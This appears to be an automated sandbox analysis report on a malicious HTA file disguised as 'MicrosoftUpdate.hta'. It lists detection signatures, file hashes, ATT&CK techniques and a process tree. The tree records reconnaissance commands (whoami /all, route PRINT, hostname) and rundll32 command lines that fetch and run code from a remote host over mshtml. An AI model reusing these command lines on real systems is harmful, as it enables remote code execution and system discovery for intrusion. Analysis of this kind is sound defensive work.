Resubmissions

25-06-2021 19:32

210625-6wc8e9cwj2 8

17-01-2021 18:55

210117-eh6j4sptaa 10

22-12-2020 13:14

201222-pnne3mqwlx 10

Analysis

  • max time kernel
    336s
  • max time network
    410s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-06-2021 19:32

General

  • Target

    MicrosoftUpdate.hta

  • Size

    26KB

  • MD5

    12cd7a34e347311c7f07b5b10adb1266

  • SHA1

    fc35180c4e3f0e95e02b163ddbd79ce4151e3ee4

  • SHA256

    8e911752a92e891fd37232961a6d23e3af83f3ea015389a99df9cad6c9e3f869

  • SHA512

    31e4558f4fa8e9adc1e288b025ad3085f89abf3a89bb6a3857cea773c25cd97efb01cb5e814dc6f91766042f7ce1f007e621b84f09500d3672d5828a584c0e38

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 15 IoCs
  • Script User-Agent 5 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\MicrosoftUpdate.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:3956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\99d42fea-5418-8222-c08d-e713547f70ec.txt 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Windows\SysWOW64\chcp.com
        chcp 437
        3⤵
          PID:2116
        • C:\Windows\SysWOW64\whoami.exe
          whoami /all
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\32e95c7a-4316-ca2f-150b-2f25f0d4ef50.txt 2>&1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Windows\SysWOW64\chcp.com
          chcp 437
          3⤵
            PID:3672
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\980b6ad3-b47c-e3e4-13ab-da763fdcfbcd.txt 2>&1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1016
          • C:\Windows\SysWOW64\chcp.com
            chcp 437
            3⤵
              PID:3396
            • C:\Windows\SysWOW64\ROUTE.EXE
              route PRINT
              3⤵
                PID:3724
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?6MCQS7QNK9=849c0ca5ba1a4e34b50a86a8c092b973;U5AVOFNB6B=;\..\..\..\./mshtml,RunHTMLApplication
              2⤵
              • Blocklisted process makes network request
              • Suspicious use of WriteProcessMemory
              PID:3968
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\d304a516-af62-2237-ba5d-187fe6079809.txt 2>&1
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:400
                • C:\Windows\SysWOW64\chcp.com
                  chcp 437
                  4⤵
                    PID:2584
                  • C:\Windows\SysWOW64\whoami.exe
                    whoami /all
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1840
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\2eab09c8-1598-3d52-55f3-1092cd2a16d5.txt 2>&1
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3668
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 437
                    4⤵
                      PID:1424
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\3b05f362-bf66-c431-7608-9e23b8f45518.txt 2>&1
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2820
                    • C:\Windows\SysWOW64\chcp.com
                      chcp 437
                      4⤵
                        PID:788
                      • C:\Windows\SysWOW64\ROUTE.EXE
                        route PRINT
                        4⤵
                          PID:1168
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?3VXPGU55T6=b3c2f40f1aef4f9cb804499fa7d02096;BZKGKO48UY=;\..\..\..\./mshtml,RunHTMLApplication
                        3⤵
                        • Blocklisted process makes network request
                        • Suspicious use of WriteProcessMemory
                        PID:692
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?3VXPGU55T6=b3c2f40f1aef4f9cb804499fa7d02096;BZKGKO48UY=5a5c7614cf8d44e1873247f125eb76f3;\..\..\..\./mshtml,RunHTMLApplication
                          4⤵
                          • Blocklisted process makes network request
                          • Suspicious use of WriteProcessMemory
                          PID:2176
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /q /c chcp 437 & hostname 1> C:\Users\Admin\AppData\Local\Temp\a72ef732-307e-d9bf-8884-8618f865dec5.txt 2>&1
                            5⤵
                              PID:2800
                              • C:\Windows\SysWOW64\chcp.com
                                chcp 437
                                6⤵
                                  PID:3988
                                • C:\Windows\SysWOW64\HOSTNAME.EXE
                                  hostname
                                  6⤵
                                    PID:3052
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" InetCpl.cpl,ClearMyTracksByProcess 264
                                  5⤵
                                  • Checks processor information in registry
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3512
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:00000000
                                    6⤵
                                    • Checks processor information in registry
                                    • Modifies registry class
                                    • Suspicious use of SetWindowsHookEx
                                    PID:3852
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\System32\rundll32.exe" InetCpl.cpl,ClearMyTracksByProcess 264
                              3⤵
                              • Checks processor information in registry
                              • Modifies Internet Explorer settings
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:1824
                              • C:\Windows\SysWOW64\rundll32.exe
                                C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:00000000
                                4⤵
                                • Checks processor information in registry
                                • Modifies registry class
                                • Suspicious use of SetWindowsHookEx
                                PID:1312

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Defense Evasion

                        Modify Registry

                        1
                        T1112

                        Discovery

                        System Information Discovery

                        2
                        T1082

                        Query Registry

                        1
                        T1012

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\2eab09c8-1598-3d52-55f3-1092cd2a16d5.txt
                          MD5

                          f0d77ff34694f66fa41eab0f98efa362

                          SHA1

                          2ecc80e3560b66e79b6653b0652a9f05bee30d9b

                          SHA256

                          99bf1d0e1aff0d01d67b974154d05f07b2829c9ccd625105d6678301947d3c3d

                          SHA512

                          7e6f22fcb88f86e0c99bee650d6ab600540ddeca3301ac7c6594246a3a495edaedc7f850013f69d818f521dcf9d733ea97aaec1549be11b1abe3ee6719ec6dea

                        • C:\Users\Admin\AppData\Local\Temp\32e95c7a-4316-ca2f-150b-2f25f0d4ef50.txt
                          MD5

                          f0d77ff34694f66fa41eab0f98efa362

                          SHA1

                          2ecc80e3560b66e79b6653b0652a9f05bee30d9b

                          SHA256

                          99bf1d0e1aff0d01d67b974154d05f07b2829c9ccd625105d6678301947d3c3d

                          SHA512

                          7e6f22fcb88f86e0c99bee650d6ab600540ddeca3301ac7c6594246a3a495edaedc7f850013f69d818f521dcf9d733ea97aaec1549be11b1abe3ee6719ec6dea

                        • C:\Users\Admin\AppData\Local\Temp\3b05f362-bf66-c431-7608-9e23b8f45518.txt
                          MD5

                          eacb35bc9347661219810d2f1c3100f1

                          SHA1

                          ad95736e2b8a8ebedb142aa3d6c4c1294a97da84

                          SHA256

                          5ba7789ccbc95d63f25774e1fe07c759ef0d67bc2b081a4c919cd1e3ce6867a1

                          SHA512

                          33749dd39656962c18e6c745544e6c78604117779b1eb3f1e355b2f8db9986d25dcf4c08f6974b028e1f12c6f23c74c1ba443d144f18754e84eb6a8d448106ec

                        • C:\Users\Admin\AppData\Local\Temp\980b6ad3-b47c-e3e4-13ab-da763fdcfbcd.txt
                          MD5

                          eacb35bc9347661219810d2f1c3100f1

                          SHA1

                          ad95736e2b8a8ebedb142aa3d6c4c1294a97da84

                          SHA256

                          5ba7789ccbc95d63f25774e1fe07c759ef0d67bc2b081a4c919cd1e3ce6867a1

                          SHA512

                          33749dd39656962c18e6c745544e6c78604117779b1eb3f1e355b2f8db9986d25dcf4c08f6974b028e1f12c6f23c74c1ba443d144f18754e84eb6a8d448106ec

                        • C:\Users\Admin\AppData\Local\Temp\99d42fea-5418-8222-c08d-e713547f70ec.txt
                          MD5

                          33447ca23dba4b5c06184c9e59e576e8

                          SHA1

                          e6ff6cff2838b6798e47465c56adea05ddff9168

                          SHA256

                          fa04d3b38764c8bb50cf2d14290cb057676c6b7cc7b18a3a74e957c10e50fc2d

                          SHA512

                          67ffaf373ec60d36ba2bf2d94affe770597ed90ee41f8643104d5b2f5e738581faed58a89ff28ecb0f036d119dd4588eb131aa6bf9d4044d483cc7d0b957335d

                        • C:\Users\Admin\AppData\Local\Temp\a72ef732-307e-d9bf-8884-8618f865dec5.txt
                          MD5

                          1f6e0d4330e988337d47a563efae1411

                          SHA1

                          a60003c27d5119fdca51a8cf3487df3895822abd

                          SHA256

                          95c4693ba003a32afc7fb62261ca6f96abaf0f930649032024867d5269cfdb45

                          SHA512

                          cffdb1d3823346b95d2e0e9727ef89a1c99c3e2b548ad2b16a8d489532cf80460c0b91b48fc4057d0025bf2b99cb29f1d26630ee5c6e6aa9105c0517056cde4f

                        • C:\Users\Admin\AppData\Local\Temp\d304a516-af62-2237-ba5d-187fe6079809.txt
                          MD5

                          33447ca23dba4b5c06184c9e59e576e8

                          SHA1

                          e6ff6cff2838b6798e47465c56adea05ddff9168

                          SHA256

                          fa04d3b38764c8bb50cf2d14290cb057676c6b7cc7b18a3a74e957c10e50fc2d

                          SHA512

                          67ffaf373ec60d36ba2bf2d94affe770597ed90ee41f8643104d5b2f5e738581faed58a89ff28ecb0f036d119dd4588eb131aa6bf9d4044d483cc7d0b957335d

                        • memory/400-126-0x0000000000000000-mapping.dmp
                        • memory/692-137-0x0000000000000000-mapping.dmp
                        • memory/788-134-0x0000000000000000-mapping.dmp
                        • memory/1016-121-0x0000000000000000-mapping.dmp
                        • memory/1168-135-0x0000000000000000-mapping.dmp
                        • memory/1312-141-0x0000000000000000-mapping.dmp
                        • memory/1424-131-0x0000000000000000-mapping.dmp
                        • memory/1824-138-0x0000000000000000-mapping.dmp
                        • memory/1840-114-0x0000000000000000-mapping.dmp
                        • memory/1840-128-0x0000000000000000-mapping.dmp
                        • memory/2116-115-0x0000000000000000-mapping.dmp
                        • memory/2176-139-0x0000000000000000-mapping.dmp
                        • memory/2584-116-0x0000000000000000-mapping.dmp
                        • memory/2584-127-0x0000000000000000-mapping.dmp
                        • memory/2800-140-0x0000000000000000-mapping.dmp
                        • memory/2820-133-0x0000000000000000-mapping.dmp
                        • memory/2836-118-0x0000000000000000-mapping.dmp
                        • memory/3052-143-0x0000000000000000-mapping.dmp
                        • memory/3396-122-0x0000000000000000-mapping.dmp
                        • memory/3512-145-0x0000000000000000-mapping.dmp
                        • memory/3668-130-0x0000000000000000-mapping.dmp
                        • memory/3672-119-0x0000000000000000-mapping.dmp
                        • memory/3724-123-0x0000000000000000-mapping.dmp
                        • memory/3852-146-0x0000000000000000-mapping.dmp
                        • memory/3968-125-0x0000000000000000-mapping.dmp
                        • memory/3988-142-0x0000000000000000-mapping.dmp